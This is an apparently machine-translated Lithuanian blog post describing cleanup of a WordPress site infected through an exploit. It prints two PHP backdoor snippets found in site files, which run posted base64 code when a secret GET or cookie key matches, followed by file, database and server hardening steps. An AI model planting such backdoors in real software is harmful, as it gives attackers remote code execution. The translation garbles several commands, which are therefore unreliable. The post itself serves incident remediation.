„WordPress Exploit“ - išvalykite virusų failus, SQL ir serverio saugumą.

Prieš pradėdami skaityti šį pranešimą, jūs turėtumėte pamatyti rašyti čia, Suprasti kažką. :)

Radau jį keliuose tinklaraščio failuose stealthsettings.com, kodai, panašūs į žemiau esančius, kurie atsirado dėl viruso su WordPress išnaudoti.:

<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‘file'])); išėjimas; }?>

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); išėjimas; }?>

XmlrpcJei minėtas pasiūlymas yra apie failą xmlrpc.php nuo mieguistas, Tuo grep serverio, atrodo gana šio išeities kodus rūšies aikštelė.

pppffiuuu

Valymas užkrėstus failus:

Ooookkkk ...
1. Geriausias sprendimas, kaip tai daroma atsarginėsIr išvalyti duomenų bazė yra pašalinti failai WordPress (galite atidžiai patikrinę wp-config.php ir failus, kurie nėra griežtai susiję su wp platforma) serveryje ir įkelkite originalius iš versijos 2.5.1 (Šia proga ir padaryti versijos atnaujinimo wp :)) http://wordpress.org/download/ . Nuvalykite įskaitant teminių failus, jei jūs nepasitikite, kad jų kruopštaus patikrinimo.

Atrodo, turėjo įtakos ir failus į temas, kurios nebuvo panaudotos prieš į dienoraštį ir tiesiog pakeisti temą, neišsprendžia problemos.

./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); išėjimas; }?>

2. Paieška ir pašalinti visus failus, kuriuose yra:.. *. _new.php, * _old.php, * Jpgg, * giff, * Pngg ir WP-info.txt byla, jeigu tokių yra.

rasti. vardas „* _new.php“
rasti. vardas „* _old.php“
rasti. vardas „* .jpgg“
rasti. vardas „* _giff“
rasti. vardas „* _pngg“
rasti. pavadinimas „wp-info.txt“

3. į / Tmp , Ieškokite ir ištrinkite aplankus, pavyzdžiui, tmpYwbzT2

SQL valymas :

1. lentelėje lentelėje wp_options Patikrinkite, ar ištrinti eilutes: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Visi wp_options, eikite į active_plugins ir ištrinti, jei yra įjungti, kad baigiasi viena pratęsimų * _new.php, * _old.php, *. jpgg, *. giff, *. pngg arba jeigu kita pratęsimas įtariama, kruopščiai patikrinti.

3. Lentelėje wp_users, Pamatyti, jei yra vartotojas, kuris nėra parašęs nieko savo teise, stulpelis user_nicename. Ištrinti vartotoją, tačiau pažymi ant ID stulpelyje skaičių. Šis vartotojas gali naudotis "WordPress", kaip user_login yra sukurta ir pasirodo 00: 00: 00 0000-00-00.

4. Eiti į lentelę wp_usermeta ir ištrinti visus geležinkelių linijose, priklausančiose ID aukščiau.

Atlikę šį SQL valymą, išjunkite ir įjunkite bet kokį papildinį. (tinklaraštyje -> informacijos suvestinė -> papildiniai)

Saugus serveris:

1. Žiūrėkite, kas katalogai ir failai "rašyti(Chmod 777) ir pabandykite įdėti juos į chmod kad neleistų jų raštu bet kuriame lygyje. (Chmod 644, pavyzdžiui)

Ieškoti. -Permė-2-LS

2. Žiūrėkite, kas failai yra bitai suid arba SGID . Jei nenorite naudoti tie failai įdėti į jų chmod 0 arba pašalinti paketą, kuris jame yra. Jie yra labai pavojinga, nes jie atlikti privilegijas "grupėArba "šaknis"Ne su normaliomis vartotojo privilegijas vykdyti failą.

find /-type f-Perm-04000-LS
find /-type f-Perm-02000-LS

3. Patikrinkite, kaip uostai yra atviros ir bandykite uždaryti arba apsaugoti tuos, kurie nėra naudojami.

netstat-| grep-i klausytis

Tiek daug. Matau Kai kurie dienoraščiai draudžiama "Google" paieškos ir kiti sako: "Na jie padarė!". Na gerai tu padarei tai ... bet jūs žinote, jei "Google" pradeda uždrausti visos svetainės formavimas  IS šlamštą ir įdėti Trojos arklys (Trojan.Clicker.HTML) slapukuose?

Aistringai žiūri į technologijas, man patinka išbandyti ir rašyti pamokas apie operacines sistemas macOS, „Linux“, Windows, apie „WordPress“, „WooCommerce“ ir LEMP tinklo serverio konfigūraciją („Linux“, „NGINX“, „MySQL“ ir PHP). Rašau toliau StealthSettings.com nuo 2006 m., o po kelerių metų pradėjau rašyti „iHowTo.Tips“ mokymo programose ir naujienose apie įrenginius ekosistemoje. Apple: iPhone, „iPad“, Apple Žiūrėti, „HomePod“, iMac, MacBook, „AirPod“ ir priedai.

1 mintis apie „WordPress Exploit - valykite virusų failus, SQL ir serverio saugumą“

Palikite komentarą